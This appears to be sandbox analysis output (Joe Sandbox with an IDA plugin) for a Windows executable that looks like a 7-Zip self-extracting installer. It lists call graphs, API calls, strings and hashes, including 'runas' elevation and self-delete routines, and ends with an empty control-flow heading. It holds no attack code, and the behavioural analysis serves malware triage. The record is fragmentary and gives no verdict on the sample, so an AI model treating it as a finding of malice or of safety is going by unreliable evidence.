41581d 13541->13542 13547 40c324 13542->13547 13545 40c349 13544->13545 13546 40c34d VirtualAlloc 13544->13546 13545->13534 13546->13534 13548 40c340 VirtualAlloc 13547->13548 13549 40c32f 13548->13549 13549->13540 13553 40c98b 13550->13553 13555 40ca1f 13550->13555 13552 40cb54 13552->13411 13554 407cfb RaiseException _callnewh malloc _callnewh malloc 13553->13554 13553->13555 13554->13553 13555->13552 13580 40efda 13555->13580 13557 40c6a7 13556->13557 13558 407e45 3 API calls 13557->13558 13559 40c6c7 13558->13559 13560 407e45 3 API calls 13559->13560 13561 40c6d0 13560->13561 13562 40c753 13561->13562 13585 414841 13561->13585 13562->13414 13565 40f4b1 13564->13565 13566 40f4ab 13564->13566 13568 40f4c5 13565->13568 13569 40f319 2 API calls 13565->13569 13574 40f4e4 13565->13574 13601 40f319 13566->13601 13568->13574 13604 40f39a ResetEvent 13568->13604 13569->13568 13571 40f4d0 13572 40f39a 2 API calls 13571->13572 13573 40f4d6 13572->13573 13573->13574 13608 40f42f _beginthreadex 13573->13608 13574->13411 13577 40f3b6 2 API calls 13576->13577 13578 40f508 13577->13578 13578->13407 13579->13414 13581 41a382 3 API calls 13580->13581 13582 40effd 13581->13582 13583 41a382 3 API calls 13582->13583 13584 40f02a 13583->13584 13584->13555 13586 414851 13585->13586 13591 41485b 13585->13591 13587 40c340 VirtualAlloc 13586->13587 13587->13591 13590 414863 13590->13562 13591->13590 13592 414b84 13591->13592 13596 40f2cf 13591->13596 13593 414bad 13592->13593 13595 414b96 13592->13595 13594 415e38 ReadFile GetLastError 13593->13594 13594->13595 13595->13591 13597 40f30b 13596->13597 13598 40f2dc 13596->13598 13597->13591 13598->13597 13599 4091b6 74 API calls 13598->13599 13600 4089e9 SetFileAttributesW SetFileTime 13598->13600 13599->13598 13600->13598 13612 40f36b CreateEventW 13601->13612 13605 40f3b0 GetLastError 13604->13605 13606 40f3ac 13604->13606 13605->13571 13606->13571 13609 40f455 13608->13609 13611 40f45a 13608->13611 13616 40f3d2 GetLastError 13609->13616 13611->13574 13613 40f328 13612->13613 13614 40f38e 13612->13614 13613->13565 13615 40f3d2 GetLastError 13614->13615 13615->13613 13616->13611 13618 407b0c 13617->13618 13619 407adc 13617->13619 13618->13418 13619->13618 13620 41a3c5 3 API calls 13619->13620 13620->13618 13625 41a810 13621->13625 13623 40f339 InitializeCriticalSection 13624 407831 13623->13624 13624->13267 13625->13623 13628 40cc37 13626->13628 13627 40cc3b 13627->13445 13628->13627 13629 40cc50 13628->13629 13630 40cc72 13628->13630 13629->13627 13633 40cbe1 3 API calls 13629->13633 13631 417e5f __CxxThrowException@8 RaiseException 13630->13631 13632 40cc87 13631->13632 13634 40cca4 13632->13634 13636 40f057 13632->13636 13633->13627 13634->13445 13637 40f39a 2 API calls 13636->13637 13638 40f060 13637->13638 13639 40f39a 2 API calls 13638->13639 13640 40f069 13639->13640 13641 40f39a 2 API calls 13640->13641 13642 40f072 13641->13642 13642->13632 13644 40e74c 13643->13644 13645 40e843 3 API calls 13644->13645 13646 40e759 13645->13646 13646->12409 13648 407582 13647->13648 13652 4075b1 13647->13652 13649 405798 5 API calls 13648->13649 13650 407591 13649->13650 13651 4073d3 7 API calls 13650->13651 13651->13652 13652->12431 13654 403642 13653->13654 13655 4035eb GetUserDefaultUILanguage 13653->13655 13654->12447 13656 403608 13655->13656 13657 40360c GetSystemDefaultUILanguage 13655->13657 13656->12447 13657->13654 13658 40361c GetSystemDefaultLCID 13657->13658 13658->13654 13660 40e4dd 13659->13660 13661 40e4f2 13660->13661 13662 41a3c5 3 API calls 13660->13662 13661->12467 13662->13661 13664 40e691 13663->13664 13664->13664 13672 40e816 13664->13672 13676 40d382 13667->13676 13670 40d46e GetLastError 13671 40d772 13670->13671 13671->12475 13673 40e829 13672->13673 13674 404866 13672->13674 13675 40e9d3 3 API calls 13673->13675 13674->12472 13675->13674 13679 40d39a 13676->13679 13678 40d3c1 13678->13670 13679->13678 13680 40d3ce WriteFile 13679->13680 13680->13679 13682 40ea2f 3 API calls 13681->13682 13683 40e89d 13682->13683 13683->12527 13685 40eb5e 3 API calls 13684->13685 13686 40e3c0 13685->13686 13686->12554 13688 40e457 3 API calls 13687->13688 13689 402449 GetCurrentDirectoryW 13688->13689 13690 402469 13689->13690 13691 402459 13689->13691 13690->12559 13692 402f39 4 API calls 13691->13692 13693 402461 GetCurrentDirectoryW 13692->13693 13693->13690 13739 40259c 13694->13739 13696 40373b 13696->12564 13698 40259c 3 API calls 13699 403726 13698->13699 13699->13696 13700 40259c 3 API calls 13699->13700 13700->13696 13702 40259c 3 API calls 13701->13702 13703 4036cc 13702->13703 13704 40259c 3 API calls 13703->13704 13707 4036f6 13703->13707 13705 4036e1 13704->13705 13706 40259c 3 API calls 13705->13706 13705->13707 13706->13707 13707->12564 13709 401cb0 13708->13709 13710 401a13 13708->13710 13711 4032cb 2 API calls 13709->13711 13710->12597 13710->12598 13710->12601 13712 401cb5 13711->13712 13712->13710 13713 401cc0 13712->13713 13745 401b6a GetProcAddress 13713->13745 13716 40e66d 13715->13716 13717 40e3a5 3 API calls 13716->13717 13718 401a53 13717->13718 13718->12605 13720 40e457 3 API calls 13719->13720 13721 401ba8 13720->13721 13722 40e457 3 API calls 13721->13722 13723 401bb0 ___scrt_fastfail 13722->13723 13724 403800 3 API calls 13723->13724 13725 401c1c 13724->13725 13726 40e589 3 API calls 13725->13726 13727 401c27 13726->13727 13728 401c2c ShellExecuteExW 13727->13728 13732 401c5e 13727->13732 13729 401c46 13728->13729 13728->13732 13730 401c55 CloseHandle 13729->13730 13731 401c4a WaitForSingleObject 13729->13731 13730->13732 13731->13730 13732->12613 13734 401c82 GetProcAddress 13733->13734 13735 401ab5 13733->13735 13734->13735 13735->12601 13737 4024b6 SetCurrentDirectoryW 13736->13737 13738 4024bf 13736->13738 13737->13738 13738->12606 13742 403744 lstrlenW lstrlenW 13739->13742 13743 403762 _wcsnicmp 13742->13743 13744 4025aa 13742->13744 13743->13744 13744->13696 13744->13698 13746 401b86 13745->13746 13746->13710 15275 406128 15276 406141 15275->15276 15277 40613a 15275->15277 15279 40614a GetDlgItem 15276->15279 15285 40613f 15276->15285 15286 4058b9 15277->15286 15281 40364d 6 API calls 15279->15281 15283 406162 15281->15283 15284 40e522 3 API calls 15283->15284 15284->15285 15296 4060e8 15285->15296 15300 416e30 15286->15300 15289 4058f3 SHGetPathFromIDListW 15290 405926 SHGetMalloc 15289->15290 15291 40590e 15289->15291 15294 405938 15290->15294 15292 40e589 3 API calls 15291->15292 15293 40591f 15292->15293 15295 406fa9 16 API calls 15293->15295 15294->15285 15295->15290 15297 4060f4 15296->15297 15299 406118 15296->15299 15298 406105 EndDialog 15297->15298 15297->15299 15298->15299 15301 4058d3 SHBrowseForFolderW 15300->15301 15301->15289 15301->15294 13747 4149cb 13748 41a382 3 API calls 13747->13748 13749 4149d5 13748->13749 14473 4096f9 14474 409746 14473->14474 14475 40970f 14473->14475 14476 40ee6e VariantClear 14474->14476 14477 409744 14475->14477 14483 40ee6e 14475->14483 14476->14477 14487 40eea4 14477->14487 14480 409799 14481 40ee93 VariantClear 14480->14481 14482 4097a1 14481->14482 14484 40ee82 14483->14484 14485 40ee7d 14483->14485 14484->14477 14491 40eed6 14485->14491 14488 40eeb4 14487->14488 14489 40eeba 14487->14489 14496 40ef29 14488->14496 14489->14480 14492 40eee3 14491->14492 14493 40eedf 14491->14493 14494 40ee93 VariantClear 14492->14494 14493->14484 14495 40eee8 14494->14495 14495->14484 14499 40ef39 14496->14499 14497 40ef6f 14497->14489 14498 40ef57 VariantClear 14498->14489 14499->14497 14499->14498

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 404e5f-404e8e _set_new_handler GetLastError GetTickCount 1 404e90-404e97 GetTickCount 0->1 2 404ea2-404eac 0->2 1->2 3 404e99-404ea0 GetTickCount 1->3 4 404eae 2->4 5 404ebf-404f2d call 40e457 * 3 GetModuleHandleW GetProcAddress FreeConsole call 404b55 GetCommandLineW call 403800 call 40e589 call 403b58 call 404458 2->5 3->2 3->5 6 404eb3-404ebd 4->6 23 404f3b-404f57 call 402f39 GetModuleFileNameW 5->23 24 404f2f-404f36 call 404c43 5->24 6->5 6->6 30 404f67-404f8f call 4039dd call 404458 23->30 31 404f59-404f62 call 407280 23->31 29 405776-405797 call 41a3c0 * 3 24->29 44 404f91-404f93 30->44 45 404f98-404fbe call 40e522 * 2 call 403008 30->45 39 405775 31->39 39->29 47 40508a-40508b 44->47 54 405053-405075 call 4032f6 call 40e589 call 40126c 45->54 55 404fc4-40500f call 40e589 * 2 call 40eb0a 45->55 47->29 68 405090-4050b8 call 40e383 call 40428a call 40377f 54->68 69 405077-405088 call 407280 54->69 70 405011-40501e 55->70 71 405022-40504e call 40e522 call 4030a0 call 40e6f7 55->71 86 4050c1-4050d2 call 404458 68->86 87 4050ba-4050bc 68->87 69->47 70->71 71->54 92 4050d4-4050dc 86->92 93 405139-405143 86->93 88 40576d-405770 call 41a3c0 87->88 88->39 95 4050e4-4050e7 92->95 96 4050de-4050e1 92->96 94 40517a-40517c 93->94 99 405145-405178 wsprintfW call 4030a0 call 404033 94->99 100 40517e-405194 call 4048c0 call 40147d 94->100 97 40529d-40529f 95->97 98 4050ed-4050f2 95->98 96->95 97->88 102 4050f3-4050f9 98->102 99->94 115 405196-405198 100->115 116 40519d-4051bd call 4048e2 call 4012a1 call 4035c2 100->116 105 40510a-40510d 102->105 106 4050fb-405108 102->106 105->97 108 405113-405121 call 4047b0 105->108 106->102 106->105 108->97 117 405127-405134 call 407280 108->117 118 40544c-40544d 115->118 127 405210-405214 116->127 117->118 118->88 128 405216 127->128 129 4051bf-4051d6 call 40e420 call 40e7e1 127->129 130 405221-40523e call 404ae8 128->130 142 405218-405220 call 41a3c0 129->142 143 4051d8-40520d call 404033 call 41a3c0 call 4035c2 129->143 136 405240-405251 call 4035c2 130->136 137 4052a4-4052aa 130->137 148 405253-40525b call 4030a0 136->148 149 40525d-405298 call 405798 call 4073d3 call 4057f9 136->149 139 4052b6-4052d5 CoInitializeEx call 4035c2 137->139 140 4052ac-4052b1 137->140 153 4052e5-4052e6 call 404757 139->153 154 4052d7-4052df call 40e589 139->154 140->139 142->130 143->127 148->149 149->97 165 4052eb-4052fc call 4035c2 153->165 154->153 172 40533b-40534a call 40e457 165->172 173 4052fe-405305 165->173 178 4053b0-4053b8 172->178 179 40534c 172->179 173->172 174 405307-405317 call 407180 173->174 184 40544a 174->184 185 40531d-40532d GetKeyState 174->185 181 405401-405408 178->181 182 4053ba-4053ca call 4035c2 178->182 183 405352-405379 call 40e589 call 4013e1 call 4035c2 179->183 189 40540a-405411 181->189 190 40546f-405476 181->190 198 4053dc-4053e0 182->198 199 4053cc-4053d9 call 40e589 182->199 222 405452-405463 call 407280 183->222 223 40537f-405388 183->223 184->118 185->172 188 40532f-405335 185->188 188->172 189->190 191 405413-40541c 189->191 194 4054a6-4054c2 call 40e3ef call 404757 190->194 195 405478-405481 call 402ac3 190->195 191->190 197 40541e-405433 call 407379 191->197 224 4054c4-4054ca call 40e522 194->224 225 4054cf-4054d8 call 41a3c0 194->225 202 405486-4054a4 call 40e522 call 41a3c0 195->202 197->190 215 405435-40543b 197->215 198->181 207 4053e2-4053f2 call 4035c2 198->207 199->198 236 4054dd-4054f2 202->236 207->181 226 4053f4-4053fc call 40e589 207->226 220 405468-40546a 215->220 221 40543d-405445 call 41a3c0 215->221 234 4055f4-4055f5 220->234 221->165 222->234 229 40538a-40538d 223->229 230 40538f-405392 223->230 224->225 225->236 226->181 229->183 229->230 238 405394-405397 230->238 239 405399-40539c 230->239 241 405764-40576c call 41a3c0 234->241 242 4054f4-4054f7 236->242 243 4054f9-405503 236->243 238->183 238->239 245 4053a3-4053ab call 40e589 239->245 246 40539e-4053a1 239->246 241->88 242->243 248 405507-40550e 242->248 243->248 245->178 246->183 246->245 250 405510 248->250 251 405517-405520 call 401e72 248->251 250->251 254 405522-405529 call 404b3f 251->254 255 40552e-40553a call 404ae8 251->255 254->234 260 405549-405560 call 40e457 * 2 255->260 261 40553c-405543 255->261 275 405562-40556b call 401b16 260->275 276 40556c-405570 260->276 261->260 262 4056a2-4056aa 261->262 265 4056bc-4056be 262->265 266 4056ac-4056b3 262->266 269 40572a-405731 265->269 270 4056c0-4056d2 call 4035c2 265->270 268 4056b5-4056b7 266->268 266->269 268->265 272 405762 269->272 273 405733-405743 call 4035c2 269->273 270->269 283 4056d4-405725 call 405798 call 4073d3 call 4057f9 270->283 272->241 273->272 285 405745-405749 273->285 275->276 281 405576-40557d 276->281 282 40562c-405640 call 4017ca 276->282 287 405583-4055cf call 40e635 * 2 call 40e589 call 41a3c0 * 2 GetFileAttributesW 281->287 288 405648-40569f call 404ae8 call 404607 SetCurrentDirectoryW call 404607 call 404b3f call 41a3c0 * 2 281->288 291 405645 282->291 283->269 285->272 290 40574b-40575f call 40e3ef call 4042ae 285->290 321 4055d1-4055f2 call 404b3f call 407280 call 41a3c0 * 2 287->321 322 4055fa-40562a call 40e420 call 401896 call 41a3c0 287->322 288->262 290->272 291->288 321->234 322->288
                                                    APIs
                                                    • _set_new_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0(00404E48), ref: 00404E70
                                                    • GetLastError.KERNEL32 ref: 00404E76
                                                    • GetTickCount.KERNEL32 ref: 00404E84
                                                    • GetTickCount.KERNEL32 ref: 00404E90
                                                    • GetTickCount.KERNEL32 ref: 00404E99
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00404EDC
                                                    • GetProcAddress.KERNEL32(00000000,FreeConsole), ref: 00404EE8
                                                    • FreeConsole.KERNELBASE ref: 00404EEE
                                                    • GetCommandLineW.KERNEL32(?), ref: 00404EF9
                                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,00000000), ref: 00404F4F
                                                    • wsprintfW.USER32 ref: 00405152
                                                      • Part of subcall function 004048E2: lstrcmpiW.KERNEL32(00000000,0041D424), ref: 0040497F
                                                    • CoInitializeEx.OLE32(00000000,00000006,00000000), ref: 004052BA
                                                    • GetKeyState.USER32(00000010), ref: 0040531F
                                                    • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,setup.exe, ;a), ref: 004055C6
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,setup.exe,?,?,?,?,setup.exe, ;a), ref: 0040566D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: CountTick$FileModule$AddressAttributesCommandConsoleCurrentDirectoryErrorFreeHandleInitializeLastLineNameProcState_set_new_handlerlstrcmpiwsprintf
                                                    • String ID: ;a$7ZipSfx.%03x$AutoInstall$BeginPrompt$Delete$ExecuteFile$FinishMessage$FreeConsole$HelpText$InstallPath$RunProgram$SelfDelete$SetEnvironment$SfxString%d$Shortcut$X/a$kernel32.dll$setup.exe$sfxconfig
                                                    • API String ID: 3569819413-1235976401
                                                    • Opcode ID: 96c7d2604809570e33cb2b075eccd7d9456be39bf8f0815fbe74550c2e1818a7
                                                    • Instruction ID: 4afe0878e147a2e11ef65875d1da5f9dd05df955ab03a5773119f13ba72f50e1
                                                    • Opcode Fuzzy Hash: 96c7d2604809570e33cb2b075eccd7d9456be39bf8f0815fbe74550c2e1818a7
                                                    • Instruction Fuzzy Hash: 78320571E40204BADB20BBA5EC42BAF37A4EF51318F50447FF502B61E2EA7C59918B5D

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 338 4030a0-4030b4 339 4030c7-4030c9 338->339 340 4030b6-4030b9 339->340 341 4030cb-4030d4 339->341 340->341 342 4030bb-4030c1 340->342 343 4030e0-403119 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 341->343 344 4030d6-4030db 341->344 342->339 345 40318a-40319b SetLastError 343->345 346 40311b-403145 call 41a3c5 GetEnvironmentVariableW 343->346 347 403256-403259 344->347 349 4031a1-4031ad 345->349 350 403255 345->350 355 403183-403184 call 41a3c0 346->355 356 403147-40314b GetLastError 346->356 352 4031c2-4031f3 lstrlenA call 41a3c5 349->352 353 4031af-4031ba call 4035df 349->353 350->347 365 4031f5-40321a GetLocaleInfoW 352->365 366 40323a-40324f MultiByteToWideChar 352->366 353->352 362 4031bc 353->362 367 403189 355->367 356->355 359 40314d-403155 356->359 363 403157-403161 lstrcmpiW 359->363 364 40317b-403181 359->364 362->352 363->355 368 403163-403179 call 41a3b2 363->368 364->345 369 403234 365->369 370 40321c-403232 _wtol 365->370 366->350 367->345 368->367 369->366 370->366
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,0000FDE9), ref: 004030E7
                                                    • wsprintfW.USER32 ref: 004030F8
                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403107
                                                    • GetLastError.KERNEL32 ref: 00403112
                                                    • GetEnvironmentVariableW.KERNEL32(?,00000000,00000001), ref: 0040313C
                                                    • GetLastError.KERNEL32 ref: 00403147
                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403159
                                                    • SetLastError.KERNEL32(0000FDE9), ref: 0040318D
                                                    • lstrlenA.KERNEL32(0041C988), ref: 004031C3
                                                    • GetLocaleInfoW.KERNELBASE(?,00001004,?,0000001F), ref: 00403212
                                                    • _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?), ref: 00403223
                                                    • MultiByteToWideChar.KERNEL32(000004E4,00000000,0041C988,00000001,00000000,00000002), ref: 00403249
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                    • String ID: SfxString%d
                                                    • API String ID: 1136850766-944934635
                                                    • Opcode ID: 269413e4b320063d0a99b95639d03ee5df7cdd5b2e2d540aab0701addce4f405
                                                    • Instruction ID: 27ca05c9e335442d622ca2a47e4c9ab7e1339845b52ecf7c62671a400ab31f62
                                                    • Opcode Fuzzy Hash: 269413e4b320063d0a99b95639d03ee5df7cdd5b2e2d540aab0701addce4f405
                                                    • Instruction Fuzzy Hash: 7851C471640248EFD7209F75DC85EBA7BBCEB48751B10443FE51AD72A0DB34A9918B2C

                                                    Control-flow Graph

                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,?,0041C878,00402D0D,?,00000000), ref: 00402BCC
                                                    • lstrcmpW.KERNEL32(?,0041C880,?,00402D0D), ref: 00402C18
                                                    • lstrcmpW.KERNEL32(?,0041C884), ref: 00402C2E
                                                    • SetFileAttributesW.KERNELBASE(?,00000000,?,00402D0D), ref: 00402C47
                                                    • DeleteFileW.KERNELBASE(?), ref: 00402C54
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00402C66
                                                    • FindClose.KERNEL32(00000000), ref: 00402C75
                                                    • SetCurrentDirectoryW.KERNEL32 ref: 00402C81
                                                    • SetFileAttributesW.KERNEL32(00402D0D,00000000), ref: 00402C8B
                                                    • RemoveDirectoryW.KERNEL32(00402D0D), ref: 00402C98
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: File$Find$AttributesDirectorylstrcmp$CloseCurrentDeleteFirstNextRemove
                                                    • String ID:
                                                    • API String ID: 3205300333-0
                                                    • Opcode ID: 96032a157d23d1dc45f13d9c3f4a995ba2b4e5d1d556b222625182af2114dbe1
                                                    • Instruction ID: 3453198f1be8e90aa2df61ca43fe5628ecf2ddba4b1262b2c9c77ae1f167302a
                                                    • Opcode Fuzzy Hash: 96032a157d23d1dc45f13d9c3f4a995ba2b4e5d1d556b222625182af2114dbe1
                                                    • Instruction Fuzzy Hash: F4318430A40218BBEB10AFB1ED8CAEE7B78AF04345F108176F505B10E1EB788A55CA58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 645 401b98-401be3 call 40e457 * 2 call 416e30 652 401bf0-401c05 645->652 653 401be5-401bed 645->653 654 401c10-401c2a call 403800 call 40e589 652->654 655 401c07-401c0d 652->655 653->652 660 401c2c-401c44 ShellExecuteExW 654->660 661 401c5e-401c60 654->661 655->654 662 401c61-401c78 call 41a3c0 * 2 660->662 663 401c46-401c48 660->663 661->662 664 401c55-401c58 CloseHandle 663->664 665 401c4a-401c4f WaitForSingleObject 663->665 664->661 665->664
                                                    APIs
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00401C3C
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000), ref: 00401C4F
                                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00401C58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: CloseExecuteHandleObjectShellSingleWait
                                                    • String ID: <$runas
                                                    • API String ID: 3837156514-1187129395
                                                    • Opcode ID: 36d045fd44f72857857818416a151f34c24b224d1092a382124e66874ca56cf0
                                                    • Instruction ID: 78f5ae85b9204d7899ea5eda7a0158750262f1f2b2930ba17ea377ca9dbeb8ac
                                                    • Opcode Fuzzy Hash: 36d045fd44f72857857818416a151f34c24b224d1092a382124e66874ca56cf0
                                                    • Instruction Fuzzy Hash: 7C216D71D44208ABDB10AFD4DC85ADEBBB8EF04314F10413BF915B62D1DB789994CB88

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 760 40325a-403276 FindFirstFileW 761 403278-40327b 760->761 762 40327c-40328a FindClose 760->762 763 403299-4032a0 762->763 764 40328c-403298 SetLastError 762->764 765 4032a2-4032ac call 402d4d 763->765 766 4032ad-4032b0 763->766 767 4032b2-4032c4 CompareFileTime 766->767 768 4032c6-4032ca 766->768 767->765 767->768
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0040326D
                                                    • FindClose.KERNEL32(00000000), ref: 0040327D
                                                    • SetLastError.KERNEL32(00000010), ref: 0040328E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseErrorFileFirstLast
                                                    • String ID:
                                                    • API String ID: 4020440971-0
                                                    • Opcode ID: 1bc8a92f7bf4e73e95de5579a55d09b4ff18af9b851be28831b70a4c99eb5016
                                                    • Instruction ID: abe97d326cd857d1968a3b6552ec4a15e1ca3de2d1a8ed727a5189f7341d7c6c
                                                    • Opcode Fuzzy Hash: 1bc8a92f7bf4e73e95de5579a55d09b4ff18af9b851be28831b70a4c99eb5016
                                                    • Instruction Fuzzy Hash: A8F068307405489BCF205F74DC4DB9B3FAD6B4436EF1046B5E425E00E0D778CA859A48

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 787 402cb4-402cd0 FindFirstFileW 788 402cd2-402cd6 787->788 789 402cd7-402ce5 FindClose 787->789 790 402d05-402d08 call 402b9f 789->790 791 402ce7-402cf4 SetFileAttributesW 789->791 795 402d0d-402d0f 790->795 792 402d01-402d04 791->792 793 402cf6-402d00 DeleteFileW 791->793
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(00404B53,?), ref: 00402CC7
                                                    • FindClose.KERNEL32(00000000), ref: 00402CD8
                                                    • SetFileAttributesW.KERNEL32(00404B53,00000000), ref: 00402CEC
                                                    • DeleteFileW.KERNEL32(00404B53), ref: 00402CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: File$Find$AttributesCloseDeleteFirst
                                                    • String ID:
                                                    • API String ID: 3319113142-0
                                                    • Opcode ID: bb03c308241e8e5f3fb93b425169e8c9e85a9ef2b4610538343182683258a875
                                                    • Instruction ID: b9a335d4804febfc6b74adfb8316b075736e73c60aae6555d53a99530bbd896d
                                                    • Opcode Fuzzy Hash: bb03c308241e8e5f3fb93b425169e8c9e85a9ef2b4610538343182683258a875
                                                    • Instruction Fuzzy Hash: E9F01231640148ABDF115F74ED8D7DA3FA9AF4135AF408275F91AE40E0D7B4C9859A88
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?), ref: 00402655
                                                      • Part of subcall function 00402F39: wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0000FDE9,00000001), ref: 00402F67
                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?), ref: 004026D1
                                                    • GetFileAttributesW.KERNELBASE(00000000,?,?), ref: 004026D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: FileTime$AttributesSystemlstrlenwcsncpy
                                                    • String ID:
                                                    • API String ID: 335106176-0
                                                    • Opcode ID: 9df67e113f3f435cc9ad515a2b875d0a94ddbfd9d0c9105ed0ecdbe9374f7209
                                                    • Instruction ID: 306e290e7d3cbb57f0f296fdb79284127d5b59bcfd53eb128dc102add6985be1
                                                    • Opcode Fuzzy Hash: 9df67e113f3f435cc9ad515a2b875d0a94ddbfd9d0c9105ed0ecdbe9374f7209
                                                    • Instruction Fuzzy Hash: 1A410B75500206AADB20AB69DD49EBB73A8DF40354F50443BFD45F71C2EBB8CD82829D

                                                    Control-flow Graph

